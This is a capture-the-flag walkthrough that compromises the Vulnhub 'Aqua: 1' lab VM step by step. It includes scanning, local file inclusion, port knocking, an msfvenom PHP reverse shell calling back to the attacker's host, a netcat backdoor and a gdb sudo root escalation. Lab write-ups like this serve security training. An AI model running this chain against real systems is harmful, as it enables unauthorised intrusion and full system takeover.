Aqua: 1 walkthrough Vulnhub CTF
First Scanning our local network and finding our target IP
Nmap aggressive port Scanning
nmap -A 192.168.1.14
dirb scanning time we found may URL I used a filter .php and we see our output is filter .php extension
dirb http://192.168.1.14 -X .php /usr/share/wordlists/dirb/big.txt
When I open target IP our browser and we found this page.
When clicking the “Sure, I’ll help” button, we are redirected to another page which shows credentials.
dirb scanning time we found another URL login.php I open the URL and I see a login page, I try to log in this credential: vashivmegmin and we are successfully connected to it
This URL is vulnerable to LFI(local file inclusion) we see the target system passwd file
I log in ftp but I see Connection timed massage I go to more deeply enumeration and I found Knocked Firewall implement this server
knock 192.168.1.14 1234 5678 9012
Log in with FTP Again
- username: megumin
dir command to we see all file our current directory file and permissions
Creating a msfvenom php reverse shell payload
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4545 -f raw >/tmp/shell.php
After creating a payload again login with ftp same username and password we already see directory permission ( 757 mean root user full permission and other users same permission the only group read and execute file )
this time uploading our shell web directory
We see our shell is uploaded successfully now executing our shell through LFI ( Local File Inclusion ) vulnerability
I already start our msfconsole and we shell I got a reverse shell target machine
msfconsole use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
- set lhost 192.168.1.8
- set lport 4545
now I run shell command we see blank shell this time import bash shell through python module
python3 -c 'import pty;pty.spawn("/bin/bash")'
The current user is www-data and has very limited permissions.
And ID command to we see our current user shell is www-data we have already megumin user password I run the su (Switch User) command megumin and user password again we shell our shell is changed www-data to megumin
Let’s check with sudo -l sudoers file
We see a backdoor script sudoers file now I open the script cat command and we see an automatic natcat connection bash script I run the command with sudo and backdoor is opened
Connecting to backdoor
nc 192.168.1.14 1337
again import python modules spawn a shell
python -c 'import pty;pty.spawn("/bin/bash")'
I run the ID command and we see our last user is changed to aqua user I run again sudo -l command and I found may script but I try gdb privilege escalation
GDB privilege escalation more about gdb see here
sudo gdb -nx -ex '!bash' -ex quit
cd /root ls
Reading our Last root flag